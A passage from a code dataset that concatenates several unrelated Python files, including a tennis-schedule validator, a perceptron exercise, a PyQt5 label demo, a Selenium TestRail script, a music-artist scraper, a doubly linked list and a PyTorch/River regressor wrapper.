range(num_courts+1)\n self._all_bench = range(num_courts+1,num_courts+1)\n self._benchcourt=num_courts # last \"court\" is the bench\n self._group_assignements = [[ [0 for x in self._all_players] for y in range(num_courts)] for z in self._all_rounds]\n self._games = []\n self._best = num_rounds\n self._better = num_players\n\n\n def read_team_groups(self):\n # Open the file and read the content in a list\n with open(f'final_{self._fname}', 'r') as filehandle:\n self._games = json.load(filehandle)\n #print(self._games)\n\n\n def print_final_courts(self):\n print(' '.ljust(14), ' '.join([f'court {i+1:2}'.ljust(19) for i in range(self._num_courts)]), 'bench'.ljust(10))\n for round in range(self._num_rounds):\n games = {}\n for court in range(self._num_courts+1):\n games[court]=self._games[round][f'{court}']\n str_games = [f'{v}'.ljust(18) for v in games.values()]\n print(f' Round {round+1:4}: ', ' '.join(str_games) )\n\n playersCourtCount={}\n\n for court in range(self._num_courts):\n playersCourtCount[court] = []\n for player in range(self._num_players):\n courtCount=0\n for round in range(self._num_rounds):\n if player+1 in self._games[round][f'{court}']:\n courtCount=courtCount+1\n #print(round, court, group, player+1)\n playersCourtCount[court].append(courtCount)\n print(f' Court {court+1:4}: {playersCourtCount[court]}') \n \n playersCourtDiffMax = []\n for player in range(self._num_players):\n maxCount = max(playersCourtCount[court][player] for court in range(self._num_courts))\n minCount = min(playersCourtCount[court][player] for court in range(self._num_courts))\n playersCourtDiffMax.append(maxCount-minCount)\n self._better=playersCourtDiffMax.count(max(playersCourtDiffMax))\n\n time_now = datetime.now().strftime(\"%H:%M:%S\")\n print(f' MaxDiff {max(playersCourtDiffMax):4}-{self._better}: {playersCourtDiffMax}') \n \n \n\n\n def print_player_stat(self):\n sameplayers=0\n for p1 in range(self._num_players):\n for p2 in range(p1+1, self._num_players):\n for round in range(self._num_rounds):\n roundn=mod(round+1,self._num_rounds)\n for court1 in range(self._num_courts):\n for court2 in range(self._num_courts):\n p1r1c1 = self._group_assignements[round][court1][p1]\n p2r1c1 = self._group_assignements[round][court1][p2]\n p1r2c2 = self._group_assignements[roundn][court2][p1]\n p2r2c2 = self._group_assignements[roundn][court2][p2]\n if p1r1c1+p2r1c1+p1r2c2+p2r2c2==4:\n sameplayers=sameplayers+1\n\n time_now = datetime.now().strftime(\"%H:%M:%S\")\n print(f'{time_now} : consecutive games with same players: {sameplayers}')\n\nclass groupTeams:\n def __init__(self, fname, num_players, num_rounds, num_courts):\n self._fname = fname\n self._num_players = num_players\n self._num_rounds = num_rounds\n self._num_courts = num_courts\n self._num_players_per_court=4\n self._num_bench = num_players- (num_courts*self._num_players_per_court)\n self._all_players = range(num_players)\n self._all_rounds = range(num_rounds)\n self._all_played_courts = range(num_courts)\n self._all_courts = range(num_courts+1)\n self._all_bench = range(num_courts+1,num_courts+1)\n self._benchcourt=num_courts # last \"court\" is the bench\n self._group_assignements = [[ [0 for x in self._all_players] for y in range(num_courts)] for z in self._all_rounds]\n self._groups = []\n\n def read_team_groups(self):\n # Open the file and read the content in a list\n with open(f'groups_{self._fname}', 'r') as filehandle:\n self._groups = json.load(filehandle)\n\n for round in self._all_rounds:\n group_ass = self._groups[round]\n for court in self._all_played_courts:\n groupMembers=group_ass[f'{court}']\n self._group_assignements[round][court][groupMembers[0]-1]=1\n self._group_assignements[round][court][groupMembers[1]-1]=1\n self._group_assignements[round][court][groupMembers[2]-1]=1\n self._group_assignements[round][court][groupMembers[3]-1]=1\n #print(self._group_assignements)\n #print(self._groups)\n\n def print_team_groups(self):\n \"\"\"Print team groups\"\"\"\n print(' '.ljust(14), ' '.join([f'court {i+1:2}'.ljust(19) for i in range(self._num_courts)]))\n for round in range(self._num_rounds):\n games = {}\n for court in range(self._num_courts):\n games[court]=self._groups[round][f'{court}']\n str_games = [f'{v}'.ljust(18) for v in games.values()]\n print(f' Round {round+1:4}: ', ' '.join(str_games) )\n\n def print_player_stat(self):\n sameplayers=0\n for p1 in range(self._num_players):\n for p2 in range(p1+1, self._num_players):\n for round in range(self._num_rounds):\n roundn=mod(round+1,self._num_rounds)\n for court1 in range(self._num_courts):\n for court2 in range(self._num_courts):\n p1r1c1 = self._group_assignements[round][court1][p1]\n p2r1c1 = self._group_assignements[round][court1][p2]\n p1r2c2 = self._group_assignements[roundn][court2][p1]\n p2r2c2 = self._group_assignements[roundn][court2][p2]\n if p1r1c1+p2r1c1+p1r2c2+p2r2c2==4:\n sameplayers=sameplayers+1\n\n time_now = datetime.now().strftime(\"%H:%M:%S\")\n print(f'{time_now} : consecutive games with same players: {sameplayers}')\n\nclass benchGroup:\n def __init__(self, fname, num_players, num_rounds, num_courts):\n self._fname = fname\n self._num_players = num_players\n self._num_rounds = num_rounds\n self._num_courts = num_courts\n self._num_players_per_court=4\n self._num_bench = num_players- (num_courts*self._num_players_per_court)\n self._all_players = range(num_players)\n self._all_rounds = range(num_rounds)\n self._all_played_courts = range(num_courts)\n self._all_courts = range(num_courts+1)\n self._all_bench = range(num_courts+1,num_courts+1)\n self._benchcourt=num_courts # last \"court\" is the bench\n self._bench_assignements=[ [ 0 for t in self._all_rounds] for p in self._all_players ]\n\n def read_bench_groups(self):\n if self._num_bench>0:\n bench_list = []\n # Open the file and read the content in a list\n with open(self._fname, 'r') as filehandle:\n bench_list = json.load(filehandle)\n count=0\n bench_matrix=[]\n # assign players on bench for each round in the model\n for y in self._all_rounds:\n bench=[]\n for z in range(self._num_bench):\n self._bench_assignements[bench_list[count]-1][y]=1\n count=count+1\n\n def print_bench(self):\n \"\"\"Print the tournament schedule\"\"\"\n print(' '.ljust(11), ' On bench')\n for round in range(self._num_rounds):\n bench = []\n for player in range(self._num_players):\n if self._bench_assignements[player][round]:\n bench.append(player+1)\n print(f' round {round:4}: {bench}' )\n\n def print_bench_optimization(self):\n sameplayers=0\n for p1 in range(self._num_players):\n for p2 in range(p1+1, self._num_players):\n for t1 in range(self._num_rounds):\n for t2 in range(t1+1,self._num_rounds):\n p1t1 = self._bench_assignements[p1][t1]\n p2t1 = self._bench_assignements[p2][t1]\n p1t2 = self._bench_assignements[p1][t2]\n p2t2 = self._bench_assignements[p2][t2]\n if p1t1+p2t1+p1t2+p2t2 == 4:\n sameplayers=sameplayers+1\n #print(f' Players {p1:2}-{p2:2}-{p3:2}: round:{t1} games:{g1} \\\n # {p1t1g1}-{p2t1g1}-{p3t1g1} ')\n time_now = datetime.now().strftime(\"%H:%M:%S\")\n print(f'{time_now} : bench with same players: {sameplayers}')\n\n if 0:\n for p1 in range(self._num_players):\n for t1 in range(self._num_rounds):\n p1t1 = self._bench_assignements[p1][t1]\n for t2 in range(self._num_rounds-1):\n tn=mod(t1+1+t2,self._num_rounds)\n p1tn = self._bench_assignements[p1][tn]\n if p1t1==1 and p1tn==1:\n print(f' Players {p1:2}: round:{t1}-{tn} numconsec {abs(tn-t1)} ')\n\ndef main():\n \"\"\"Entry point of the program\"\"\"\n parser = argparse.ArgumentParser(description='Compute friendly tennis schedule.')\n parser.add_argument('--players',\n '-p',\n default=12,\n type=int,\n help='number of players (default:12)')\n parser.add_argument('--rounds',\n '-r',\n default=6,\n type=int,\n help='number of rounds (default:6)')\n parser.add_argument('--courts',\n '-c',\n default=3,\n type=int,\n help='number of courts played per round (default:3)')\n parser.add_argument('--file',\n '-f',\n default='bench.txt',\n type=str,\n help='filename for list of players on bench (default:bench.txt)')\n args = vars(parser.parse_args())\n\n # Data.\n fname=args['file']\n num_players = args['players']\n num_rounds = args['rounds']\n num_courts = args['courts'] \n num_players_per_court=4\n num_bench = num_players- (num_courts*num_players_per_court)\n \n print(f\"players: {num_players}, rounds: {num_rounds}, courts played per round: {num_courts}, on bench: {num_bench}\")\n if num_bench>0:\n min_bench=math.floor(num_rounds*num_bench/num_players)\n max_bench=math.ceil(num_rounds*num_bench/num_players)\n distance_on_bench=math.ceil(num_players/num_bench)-2\n print(f\"min/max presence on bench is {min_bench} / {max_bench}\")\n print(f\"minimal distance on bench is {distance_on_bench}\")\n\n\n # Creates games variables.\n all_players = range(num_players)\n all_rounds = range(num_rounds)\n all_played_courts = range(num_courts)\n all_courts = range(num_courts+1)\n all_bench = range(num_courts+1,num_courts+1)\n benchcourt=num_courts # last \"court\" is the bench\n\n rand_players=list(range(num_players))\n random.shuffle(rand_players)\n benchVar = {}\n duoVar = {}\n games = {}\n\n if 0:\n groupbench = benchGroup(fname, num_players, num_rounds, num_courts)\n groupbench.read_bench_groups()\n groupbench.print_bench()\n groupbench.print_bench_optimization()\n\n groupteam = groupTeams(fname, num_players, num_rounds, num_courts)\n groupteam.read_team_groups()\n groupteam.print_team_groups()\n groupteam.print_player_stat()\n\n finalcourts = finalCourts(fname, num_players, num_rounds, num_courts)\n finalcourts.read_team_groups()\n finalcourts.print_final_courts()\n else:\n with open(f'prefinal_{fname}', 'r') as f:\n myfile = f.read().splitlines()\n\n groups=[]\n for i in range(len(myfile)):\n games={}\n for court in range(num_courts):\n startix=15+(court*20)\n games[f'{court}']=json.loads(myfile[i][startix:startix+20])\n startix=15+(num_courts*20)\n games[f'{num_courts}']=json.loads(myfile[i][startix:])\n groups.append(games)\n print(groups)\n with open(f'final_{fname}', 'w') as filehandle: \n json.dump(groups, filehandle)\n\nif __name__ == '__main__':\n main()","repo_name":"andrebeliveau/roundRobinAllocation","sub_path":"src/validate_sat.py","file_name":"validate_sat.py","file_ext":"py","file_size_in_byte":13745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29886710977","text":"\nimport numpy as np\nand_=np.array([[0.,0.,0.],[0.,1.,0.],[1.,0.,0.],[1.,1.,1.]])\nx =np.array([[0.,0.],[0.,1.],[1.,0.],[1.,1.]])\ny=np.array([0.,1.,1.,1.])\nweights=np.array([0.,0.])\nb=0.;\nfunc = lambda pred: 0 if pred < 0 else 1\nfor i in range(10):\n for X,Y in zip(x,y):\n pred = np.dot(weights,X) + b\n yhat=func(pred)\n errr = Y - yhat\n weights += 0.1*errr*X\n b += 0.1*errr\nprint(weights)\nprint(b)\n\ndef predict(x):\n pred = np.dot(weights, x) + b\n yhat = func(pred)\n return yhat\nprint(predict([0,0]))\nprint(predict([0,1]))\nprint(predict([1,0]))\nprint(predict([1,0]))\n\n\nimport math\n# Write a function that takes as input a list of numbers, and returns\n# the list of values given by the softmax function.\ndef softmax(L):\n pro=[]\n denom=0\n for l in range(len(L)):\n denom+=math.exp(l)\n for l in range(len(L)):\n pro.append(math.exp(l)/denom)\n return pro\n pass\n\n\n","repo_name":"MarkosMuche/NueralNets","sub_path":"PerceptronForLogic.py","file_name":"PerceptronForLogic.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8915347329","text":"\"\"\"\nQLabel控件:\nsetAlignment(): 设置文本对齐方式\nsetIndent():设置文本缩进\ntext():获取文本内容\nsetBuddy():设置伙伴关系\nsetText():设置文本内容\nselectedText():返回所选择的内容\nsetWordWrap():设置是否允许换行\n\"\"\"\nimport sys\nfrom PyQt5.QtWidgets import (\n QVBoxLayout,\n QMainWindow,\n QApplication,\n QPushButton,\n QWidget,\n QToolTip,\n QLabel\n)\nfrom PyQt5.QtGui import QPixmap, QFont, QPalette\nfrom PyQt5.QtCore import Qt\n# 有些常量是在Qt里面如Qt.blue\n# QPixmap表示显示图片\n\n\nclass QLabelDemo(QWidget):\n def __init__(self):\n super(QLabelDemo, self).__init__()\n self.initUI()\n\n def initUI(self):\n label_1 = QLabel()\n label_2 = QLabel()\n label_3 = QLabel()\n label_4 = QLabel()\n\n label_1.setText(\"这是一个文本标签.\") # 设置字体大小和颜色\n label_1.setAutoFillBackground(True) # 自动填充背景\n palette = QPalette() # 创建调色板\n palette.setColor(QPalette.Window, Qt.blue) # 设置背景色\n label_1.setPalette(palette) # 对标签使用调色板\n label_1.setAlignment(Qt.AlignCenter) # 对文本使用居中对齐\n\n label_2.setText(\"欢迎使用Python GUI程序\") # 这个为什么这么写呢!!!!\n\n label_3.setAlignment(Qt.AlignCenter) # 居中对齐\n\n label_3.setToolTip('这是一个图片')\n label_3.setPixmap(QPixmap(\n 'D:\\\\The Road For Finacial Statics\\\\GitHub\\\\vnpy_learning\\\\vnpy_learning\\\\vnpy-2.0.9\\\\my_code\\\\PyQt5学习程序\\\\images\\\\11.jpg')) # 不知道为什么用相对地址不行\n\n # 如果设置为True,用浏览器打开网页,如果设为false,调用槽函数\n label_4.setOpenExternalLinks(True)\n label_4.setText(\n \"感谢关注《python从菜鸟到高手》\")\n # 向右对齐\n label_4.setAlignment(Qt.AlignRight)\n # 提示文字\n label_4.setToolTip('这是一个超链接')\n\n # 垂直对齐布局\n vbox = QVBoxLayout()\n vbox.addWidget(label_1) # 添加标签\n vbox.addWidget(label_2)\n vbox.addWidget(label_3)\n vbox.addWidget(label_4)\n # 标签绑定信号槽\n label_2.linkHovered.connect(self.linkHovered)\n label_4.linkActivated.connect(self.linkclicked)\n \n # 把vbox的布局放到self实例里面去\n self.setLayout(vbox)\n self.setWindowTitle(\"QLabel控件演示\")\n\n def linkHovered(self):\n print(\"当鼠标滑过label_2标签时,触发事件\")\n\n def linkclicked(self):\n print(\"当鼠标单击label_4标签时,触发事件\")\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = QLabelDemo()\n main.show()\n\n sys.exit(app.exec_())\n","repo_name":"laoshu198838/vnpy_learning","sub_path":"vnpy-2.0.9/my_code/PyQt5学习程序/QLabelDemo.py","file_name":"QLabelDemo.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75207856803","text":"import unittest\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom pages.testrailpage import TestRailPage\nfrom datetime import datetime\nimport os\nimport sys\nsys.path.append('/Users/zennode/PycharmProjects/WCFE-Free-new')\n\nclass CreateTestRun(unittest.TestCase):\n # run_id = 0\n\n @classmethod\n def setUpClass(cls):\n options = Options()\n options.add_argument('--headless')\n cls.driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)\n cls.driver.set_page_load_timeout(100)\n\n def test_add_test_run(self):\n driver = self.driver\n create_testrail_test_run = TestRailPage()\n now = datetime.now()\n current_date_time = now.strftime(\"%d/%m/%Y %H: %M: %S\")\n url = os.environ.get('WCFEF_LOGIN_URL')\n n = 3\n groups = url.split('/')\n run_id = create_testrail_test_run.create_testrail_test_run(13, current_date_time + \"-\" + '/'.join(groups[:n]))\n # CreateTestRun.run_id = create_testrail_test_run.create_testrail_test_run(13, \"Text-Advanced test\")\n return run_id\n\n @classmethod\n def tearDownClass(cls):\n print(\"Testrail\")\n cls.driver.close()\n cls.driver.quit()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"LittyThomasJ/Automation-1","sub_path":"tests/createtestrun.py","file_name":"createtestrun.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5732278399","text":"import heapq\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nINSERT = 'I'\r\nDELETE = 'D'\r\nEMPTY = 'EMPTY'\r\n\r\nT = int(input())\r\nfor _ in range(T):\r\n k = int(input())\r\n min_heap = [] # 양수\r\n max_heap = [] # 음수\r\n exist_number = {}\r\n \r\n for _ in range(k):\r\n command, n = input().rstrip().split()\r\n n = int(n)\r\n\r\n if command == INSERT:\r\n if not exist_number.get(n):\r\n exist_number[n] = 0\r\n exist_number[n] += 1\r\n heapq.heappush(min_heap, n)\r\n heapq.heappush(max_heap, n * -1)\r\n else:\r\n if n == 1: # 최대값 삭제\r\n if len(max_heap) != 0:\r\n while max_heap:\r\n if exist_number[max_heap[0] * -1] == 0:\r\n heapq.heappop(max_heap)\r\n continue\r\n \r\n max_num = heapq.heappop(max_heap)\r\n exist_number[max_num * -1] -= 1\r\n break\r\n else: # 최소값 제거\r\n if len(min_heap) != 0:\r\n while min_heap:\r\n if exist_number[min_heap[0]] == 0:\r\n heapq.heappop(min_heap)\r\n continue\r\n\r\n min_num = heapq.heappop(min_heap)\r\n exist_number[min_num] -= 1\r\n break\r\n \r\n keys = list(exist_number.keys())\r\n keys.sort()\r\n exist = []\r\n\r\n for key in keys:\r\n if exist_number[key]:\r\n exist.append(key)\r\n \r\n if len(exist) == 0:\r\n print(EMPTY)\r\n else:\r\n print(max(exist), min(exist))","repo_name":"BangDori/python-algorithm","sub_path":"백준/Gold/7662. 이중 우선순위 큐/이중 우선순위 큐.py","file_name":"이중 우선순위 큐.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7613457267","text":"import sqlite3\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef addMusikDB():\n connect = sqlite3.connect('databased.db', check_same_thread=False)\n\n cursor = connect.cursor()\n\n nameList = []\n linkLsit = []\n\n i = 0\n x = 0\n \n while True:\n url = requests.get(f'https://ru.hitmotop.com/artists/start/{x}')\n html = BeautifulSoup(url.text, 'html.parser')\n\n bloks = html.find_all('li', class_='album-item')\n\n for blok in bloks:\n name = blok.find('span', class_='album-title').text\n link = 'https://ru.hitmotop.com' + blok.find('a', class_='album-link').get('href')\n nameList.append(name)\n linkLsit.append(link)\n print(name)\n\n\n \n x += 48\n\n if x == 1056:\n break\n\n\n while i < len(nameList):\n name1 = nameList[i]\n link1 = linkLsit[i]\n\n cursor.execute('INSERT INTO performers VALUES (?,?);', (name1, link1))\n connect.commit()\n print('Добавлено' + str(i))\n i = i + 1\n\n","repo_name":"12www1208/WebSpider","sub_path":"addperformers.py","file_name":"addperformers.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30505723017","text":"\nnedic = dict()\n\nfname= input(\"Enter file name: \")\nfhand = open(fname)\nfor line in fhand:\n if line.startswith(\"From\"):\n words = line.split()\n if len(words)>2:\n emailadd = words[1]\n nedic[emailadd] = nedic.get(emailadd, 0) + 1 \n\n\n \nanlist = list()\nfor email, count in list(nedic.items()):\n anlist.append((count, email))\nanlist.sort(reverse=True)\nprint(anlist)\n\n","repo_name":"sahrmohamed/py4e_exercises","sub_path":"tuple/ex10-01.py","file_name":"ex10-01.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71623712484","text":"import json\nimport plotly.express as px\nimport pandas as pd\nfrom datetime import datetime\n\n\ndef convert_date(iso_string):\n \"\"\"Converts and ISO formatted date into a human readable format.\n \n Args:\n iso_string: An ISO date string..\n Returns:\n A date formatted like: Weekday Date Month Year\n \"\"\"\n d = datetime.strptime(iso_string, \"%Y-%m-%dT%H:%M:%S%z\")\n return d.strftime('%A %d %B %Y')\n\n\ndef convert_f_to_c(temp_in_farenheit):\n \"\"\"Converts an temperature from farenheit to celcius\n\n Args:\n temp_in_farenheit: integer representing a temperature.\n Returns:\n An integer representing a temperature in degrees celcius.\n \"\"\"\n temp_in_farenheit = float(temp_in_farenheit)\n celcius = (temp_in_farenheit - 32) * 5.0/9.0\n return round(celcius, 1)\n\ndef process_weather(forecast_file):\n \"\"\"Converts raw weather data into meaningful text.\n\n Args:\n forecast_file: A string representing the file path to a file\n containing raw weather data.\n Returns:\n A string containing the processed and formatted weather data.\n \"\"\"\n with open(forecast_file) as json_file:\n json_data = json.load(json_file) \n\n# # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# Lists and Variables \n\n date_list = []\n min_list = []\n max_list = []\n min_realfeel_list = []\n min_realfeelshade_list = []\n\n for day in json_data['DailyForecasts']:\n date_list.append(convert_date(day[\"Date\"]))\n max_list.append(convert_f_to_c(day[\"Temperature\"][\"Maximum\"][\"Value\"]))\n min_list.append(convert_f_to_c(day[\"Temperature\"][\"Minimum\"][\"Value\"]))\n min_realfeel_list.append(convert_f_to_c(day[\"RealFeelTemperature\"][\"Minimum\"][\"Value\"]))\n min_realfeelshade_list.append(convert_f_to_c(day[\"RealFeelTemperatureShade\"][\"Minimum\"][\"Value\"]))\n\n # define the number of days in the source file\n num_days = len(date_list)\n\n# -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# Graphs\n\n # Graph 1: Min & Max Temps by Day \n df = {\n \"Dates\": date_list, \n \"Minimum\": min_list,\n \"Maximum\": max_list,\n \"Min Real Feel\": min_realfeel_list,\n \"Min Real Feel Shade\": min_realfeelshade_list\n }\n\n fig = px.line(\n df,\n x=\"Dates\",\n y=[\"Minimum\", \"Maximum\"],\n title=f\"Min & Max Temperatures Over {num_days} Days\"\n )\n\n fig.update_layout(\n yaxis_title='Temperature (Celcius)',\n legend_title_text='Temperatures'\n )\n fig.write_html(\"first-graph.html\")\n\n # Graph 2: Minimum Temperatures by Day\n fig = px.line(\n df,\n x=\"Dates\",\n y=[\"Minimum\", \"Min Real Feel\", \"Min Real Feel Shade\"]\n )\n\n fig.update_layout(\n title=f\"Minimum Temperatures Over {num_days} Days\",\n yaxis_title='Temperature (Celcius)',\n legend_title_text='Minimum Temperatures'\n )\n fig.write_html(\"second-graph.html\")\n# # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n # print(process_weather(\"data/forecast_5days_a.json\")) \n # print(process_weather(\"data/forecast_5days_b.json\"))\n print(process_weather(\"data/forecast_10days.json\"))\n print()\n","repo_name":"DebbyMurphy/project2_python_weather-data","sub_path":"part2/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44012882824","text":"# -*- coding:utf-8 -*-\nclass BaseNode(object):\n def __init__(self, item):\n # 上一结点\n self.pre = None # 双向链表比单向链表多 一个pre\n self.item = item\n # 下一结点\n self.next = None\n\n\nclass DoubleLinkList(object):\n \"\"\" 双向链表 \"\"\"\n\n def __init__(self, node=None):\n self.__head = node\n\n def is_empty(self):\n return self.__head is None\n\n def length(self):\n if self.is_empty():\n return 0\n else: # 头不为空,开始遍历计数\n cur = self.__head\n count = 0\n while cur is not None:\n count = count + 1\n cur = cur.next # 常规操作\n return count\n\n def travel(self):\n if self.is_empty():\n print(\"\")\n else: # 有数据\n cur = self.__head\n while cur is not None:\n print(cur.item, end=\" \")\n cur = cur.next\n print(\"\")\n\n def search(self, item):\n if self.is_empty():\n return False\n else:\n cur = self.__head\n while cur is not None:\n if cur.item == item:\n return True # --> 表示有即可\n cur = cur.next\n return False # --> 循环完毕\n\n def add(self, item):\n \"\"\" 头部增加 \"\"\"\n node = BaseNode(item)\n node.next = self.__head\n self.__head = node\n # 比单链多的属性修改\n if node.next: # --> node.next 就是原来的 self.__head , 意思就是原来的链表不为空\n node.next.pre = node # --> 原来的结点的 pre是 None 需赋值,\n # else:\n # node.next.pre = None # --> 原本就是None不必写\n #\n\n def append(self, item):\n \"\"\" 尾部增加 \"\"\"\n node = BaseNode(item)\n if self.is_empty():\n self.__head = node # pre默认None符合需求\n # self.add(item)\n else: # 原先链表不为空\n cur = self.__head\n while cur.next is not None:\n cur = cur.next\n # 循环结束该cur就是尾结点,修改属性\n cur.next = node\n node.pre = cur # 比单向链表多的属性pre属性赋值\n\n def insert(self, pos, item):\n \"\"\" 双向链表指定位置插入 \"\"\"\n if pos <= 0:\n self.add(item)\n elif pos >= self.length():\n self.append(item)\n else: # 中间\n node = BaseNode(item)\n cur = self.__head\n count = 0\n # 写法1 #\n # while count < pos:\n # count += 1\n # cur = cur.next\n #\n # cur.pre.next = node\n # node.pre = cur.pre\n # cur.pre = node # cur.pre = node一定要在node.pre = cur.pre之后!\n # node.next = cur\n\n # 写法2 #\n while cur is not None:\n if count == pos:\n cur.pre.next = node # 插入位置的上一结点 是当前新的结点\n node.pre = cur.pre # 当前结点的上一节点是旧的cur的上一结点\n cur.pre = node # cur的上一节点(即将成为node的下一节点)是node # cur.pre = node一定要在node.pre = cur.pre之后!\n node.next = cur # node的下一节点是cur\n return True # or break 操作完毕无需继续循环\n count += 1\n cur = cur.next\n\n def remove(self, item):\n \"\"\" 双向链表删除指定元素 \"\"\"\n if self.is_empty():\n return False # 无需删除,删除失败\n else: # 双向列表非空\n cur = self.__head\n while cur is not None:\n if cur.item == item: # 找到删除项目\n if cur == self.__head: # 删头\n self.__head = cur.next\n if cur.next is not None: # 第二个元素不是最后一个元素的情况,如果第二个元素是最后一个元素,cur.pre.next 默认为None\n cur.next.pre = None # 新头元素pre为None\n else: # 删中间和删尾部\n # cur.pre.next = None # 删除尾部(很关键容易漏掉该情况) else情况提前\n if cur.next is not None: # 肯定在中间,左右都有元素\n cur.pre.next = cur.next # 上个元素的next指向下一个元素\n cur.next.pre = cur.pre # 下一个元素的pre指向上一个元素\n else: # 删除尾部(很关键容易漏掉该情况)\n cur.pre.next = None # 因为双向链表尾结点next 是None\n return True # 删除成功\n\n cur = cur.next # 常规移动\n\n return False # 一个匹配的也没找到删除失败!\n\n\nif __name__ == '__main__':\n ll = DoubleLinkList()\n # ll.add(2)\n ll.add(1)\n ll.append(333)\n ll.insert(4, 123)\n print(ll.is_empty())\n print(ll.length())\n ll.remove(1)\n ll.travel()\n pass\n","repo_name":"qq453388937/calc_mmd","sub_path":"calc_6_class_双向链表.py","file_name":"calc_6_class_双向链表.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12958342010","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom python.leetcode_tree_helper import deserialize, TreeNode\nclass Solution(object):\n def rightSideView(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n result_list=[] #Final result list of list is saved here\n if root is None:\n return []\n\n queue=[] # each node's children are saved here\n queue.append(root)\n\n while(len(queue)>0): # For each root's child, make it as root and save their left & right child\n next_level_q=[] # Store children of each node at current level\n for element in queue:\n if element.right is not None:\n next_level_q.append(element.right)\n if element.left is not None:\n next_level_q.append(element.left)\n result_list.append(queue[0].val)\n queue=next_level_q #Updating the queue with next level children to make them current nodes\n\n return result_list\n\ns=Solution()\nroot = deserialize('[3,9,20,null,null,15,7]')\nprint(s.rightSideView(root))\n","repo_name":"NiharikaGoel12/algo-practice","sub_path":"python/199_BTree_right_view_traversal.py","file_name":"199_BTree_right_view_traversal.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73391451685","text":"import torch\nimport torch.nn as nn\nfrom .image import MVCNN\nfrom .dgcnn import DGCNN\nimport torch.nn.functional as F\n\nclass UniModel(nn.Module):\n def __init__(self, n_class):\n super().__init__()\n self.model_img = MVCNN(n_class, n_view=12)\n self.model_pt = DGCNN(n_class)\n\n self.linear1 = nn.Linear(2048+512, 1024, bias=False)\n self.bn6 = nn.BatchNorm1d(1024)\n self.dp1 = nn.Dropout(p=0.5)\n self.linear2 = nn.Linear(1024, 512)\n self.bn7 = nn.BatchNorm1d(512)\n self.dp2 = nn.Dropout(p=0.5)\n self.linear3 = nn.Linear(512, 256)\n self.bn3 = nn.BatchNorm1d(256)\n self.linear4= nn.Linear(256,n_class)\n\n def forward(self, data, global_ft=False):\n\n img, pt = data\n ft_pt=self.model_pt(pt)\n ft_img=self.model_img(img)\n\n total_img_pt_ft = torch.cat((ft_img,ft_pt),1)\n\n x = F.leaky_relu(self.bn6(self.linear1(total_img_pt_ft)), negative_slope=0.2)\n x = self.dp1(x)\n x = F.leaky_relu(self.bn7(self.linear2(x)), negative_slope=0.2)\n x = self.dp2(x)\n x = F.leaky_relu(self.bn3(self.linear3(x)),negative_slope=0.2)\n x = self.linear4(x)\n\n if global_ft:\n return (x),(total_img_pt_ft)\n else:\n return x\n\n","repo_name":"chidambar-gif/3D-object-retrieval","sub_path":"models/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32626303820","text":"import qa\n\nif __name__ == '__main__':\n # 获取token并储存在txt文件中,定期更新\n with open(r'token.txt','a+',encoding='utf-8') as f:\n f.truncate(0)\n token=qa.token_get()\n with open(\"token.txt\",\"w\") as f:\n f.write(token) \n # 自带文件关闭功能,不需要再写f.close()\n\n","repo_name":"Rah-xephon/sdu_answer_system","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19446420085","text":"import torch\n\nfrom .. import base\n\n__all__ = [\"PyTorch2RiverRegressor\"]\n\n\nclass PyTorch2RiverBase:\n def __init__(self, net, loss_fn, optimizer, batch_size, x_tensor, y_tensor):\n self.net = net\n self.loss_fn = loss_fn\n self.optimizer = optimizer\n self.batch_size = batch_size\n self.x_tensor = x_tensor\n self.y_tensor = y_tensor\n self._x_batch = [None] * batch_size\n self._y_batch = [None] * batch_size\n self._batch_i = 0\n\n def learn_one(self, x, y):\n\n self._x_batch[self._batch_i] = list(x.values())\n self._y_batch[self._batch_i] = [y]\n\n self._batch_i += 1\n\n if self._batch_i == self.batch_size:\n\n x = self.x_tensor(self._x_batch)\n y = self.y_tensor(self._y_batch)\n\n self.optimizer.zero_grad()\n y_pred = self.net(x)\n loss = self.loss_fn(y_pred, y)\n loss.backward()\n 